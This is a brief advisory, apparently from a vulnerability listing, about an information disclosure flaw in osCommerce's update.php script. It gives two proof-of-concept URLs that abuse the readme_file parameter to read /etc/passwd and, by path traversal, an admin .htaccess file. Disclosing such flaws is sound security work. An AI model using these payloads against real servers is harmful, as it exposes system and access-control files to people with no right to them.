|
OSCommerce Update.PHP Information Disclosure Vulnerability
No exploit is required. The following proof-of-concept URIs are available: http://www.example.com/catalog/extras/update.php?readme_file=/etc/passwd http://www.example.com/catalog/extras/update.php?readme_file=../admin/.htaccess |
|
|
Privacy Statement |